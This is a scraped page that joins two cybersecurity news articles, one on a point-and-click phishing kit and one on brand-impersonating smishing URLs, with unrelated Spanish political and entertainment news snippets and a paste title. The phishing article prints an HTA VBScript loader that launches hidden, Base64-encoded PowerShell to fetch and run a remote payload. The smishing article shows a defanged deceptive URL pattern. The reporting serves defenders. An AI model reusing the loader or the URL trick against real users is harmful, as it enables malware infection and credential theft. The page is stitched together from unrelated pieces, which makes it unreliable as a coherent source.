A novel phishing kit has surfaced that enables threat actors to craft sophisticated lures with minimal technical expertise. This “point-and-click” toolkit combines an intuitive web interface with powerful payload delivery mechanisms. Attackers can select from preconfigured templates, customize branding elements, and target specific organizations or individuals. Once a phishing page is deployed, victims are presented with seemingly innocuous download prompts that, in reality, trigger the delivery of malicious code . Ad promoting the Impact Solutions payload delivery kit to cybercriminals (Source – Abnormal.ai) Early incidents show the kit leveraging common file formats such as Microsoft Office documents and HTML applications. Upon opening, the documents prompt users to enable macros or allow execution of embedded scripts. Outsourcing the heavy lifting to built-in scripting engines, the kit constructs payloads on the fly, rendering many static signature–based defenses ineffective. Initial campaign data indicates a significant click-through rate, suggesting the social engineering elements are exceptionally convincing. Abnormal.ai analysts noted that the kit’s landing pages employ dynamic content injection to evade URL filtering solutions by rotating resource identifiers every few minutes. This approach frustrates automated scanners and contributes to extended dwell time on victim machines, allowing stealthy payload staging and execution. Researchers identified instances where the payload download URLs were concealed behind multi-step redirects, disguising their true destination until the final fetch operation. Furthermore, Abnormal.ai researchers identified that once the victim enables content execution, the embedded script executes a PowerShell one-liner that retrieves and executes the final payload from a remote server. This PowerShell command is obfuscated in Base64 and wrapped in a compressed archive, bypassing most heuristic engines. Victims remain unaware as the process runs with minimal user interaction and no visible windows. In-Depth Examination of the Infection Mechanism At the heart of the kit’s infection chain lies an HTML Application (HTA) module that acts as the initial loader. Fake invoice HTML page telling victims to open a file that launches malware (Source – Abnormal.ai) When the victim clicks “Enable Editing” or “Allow Blocked Content,” the HTA file executes:- [script language="VBScript"] Dim objShell Set objShell = CreateObject("WScript.Shell") objShell.Run "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " & _ "JABlAHgAZQBjAGUAbQBUAG8ARABvAHcAbgBsAG8AZABGAGUAcgBfAFIAZQBzAG8AdQByAGMAZQA9ICJuU0M…" [/script] This snippet decodes to a PowerShell payload that downloads an encrypted binary, decrypts it in memory, and executes it directly from RAM. By operating in memory, the kit avoids writing malicious files to disk, undermining file-based detection. The downloaded binary functions as a modular loader, fetching additional components such as credential stealers or ransomware droppers. Persistence is achieved by creating a hidden scheduled task that re-launches the loader every hour under the context of the logged-on user. This tactic ensures continued access even if the initial document is closed or the machine is rebooted. The scheduled task name is randomized for each campaign, complicating manual detection efforts. Overall, this point-and-click phishing kit represents a significant escalation in accessible attack capabilities, combining user-friendly interfaces with advanced evasion and payload delivery techniques. Cybersecurity teams must prioritize monitoring for anomalous task scheduler entries and unusual HTA executions, as well as reinforcing user training around enabling content in untrusted documents. Follow us on  Google News ,  LinkedIn , and  X  to Get More Instant Updates ,  Set CSN as a Preferred Source in  Google . The post New ‘Point-and-Click’ Phishing Kit Bypasses User Awareness and Security Filters to Deliver Malicious Payloads appeared first on Cyber Security News .

El plan de paz abre la puerta a la «creación de un Estado palestino» (que ya existe). Los habitantes de Gaza hablan de «farsa».

Cybercriminals have launched a sophisticated campaign that leverages brand impersonation techniques to distribute malware through deceptive SMS phishing (smishing) attacks. This emerging threat demonstrates an evolution in social engineering tactics, where attackers strategically craft URLs containing trusted brand names to bypass user skepticism and security filters. The attack methodology centers on manipulating URL structures to create false legitimacy. Threat actors embed recognizable brand names before the “@” symbol in malicious URLs, followed by the actual malicious domain. This technique exploits user psychology, as recipients often focus on familiar brand names rather than scrutinizing the complete URL structure. Unit 42 researchers identified that this wave of attacks extends beyond simple URL manipulation, incorporating deceptively named group messaging campaigns and strategically aged hostnames to enhance credibility. Attackers are now distributing #smishing URLs with the name of a trusted entity before the @ symbol, followed by the true domain to deceive users. This wave of attacks also involves deceptively named group texts and strategically aged hostnames. Details at https://t.co/FttCPMXr65 pic.twitter.com/3MuJvQC0bI — Unit 42 (@Unit42_Intel) October 2, 2025 The attackers have demonstrated particular interest in utilizing .xin domain extensions, which provide an additional layer of obfuscation while maintaining apparent legitimacy. The campaigns typically initiate through SMS messages appearing to originate from legitimate organizations, directing recipients to click malicious links for account verification, delivery notifications, or security alerts. Upon interaction, these URLs redirect users to credential harvesting pages or trigger automatic malware downloads targeting mobile and desktop platforms. Advanced Infection Mechanisms and Domain Tactics The sophisticated nature of these attacks lies in their multi-stage infection process and domain preparation strategies. Attackers pre-register domains months in advance, allowing them to establish domain reputation scores that evade automated security screening . The malicious infrastructure employs rotating subdomains and URL shortening services to complicate tracking efforts. Example malicious URL structure: hxxps://[email protected]/verify-account The payload delivery mechanism utilizes progressive profiling, where initial clicks gather device fingerprinting data before deploying platform-specific malware variants. This approach maximizes infection success rates while minimizing detection by security solutions that rely on static URL analysis. Follow us on  Google News ,  LinkedIn , and  X  to Get More Instant Updates ,  Set CSN as a Preferred Source in  Google . The post Threat Actors Mimic Popular Brands to Deceive Users and Deploy Malware in New Wave of Attacks appeared first on Cyber Security News .

Musk Doge Men - Paste created by Anonymous on Feb 3rd, 2025

El actor ha señalado en la antesala de los Premios Goya de Granada que el mandatario estadounidense es "un peligro para todas las personas de este plane...

El nacionalista Oscar Insua despliega un rollo de papel de varios metros con la lista de los contratos entre Eulen y la administracion autonómica para denunciar que la Xunta le oculta documentación a ...

Los humoristas, presentador y colaboradora de ‘La revuelta’, toman el relevo de Ramón García y Ana Mena, que fueron los encargados de dar la bienvenida a 2024 en la cadena pública. Tratarán de…

La salida del primer ministro, al no poder convocarse elecciones hasta julio, obligaría a buscar un reemplazo y formar otro Gobierno a la mayor brevedad para aprobar unos presupuestos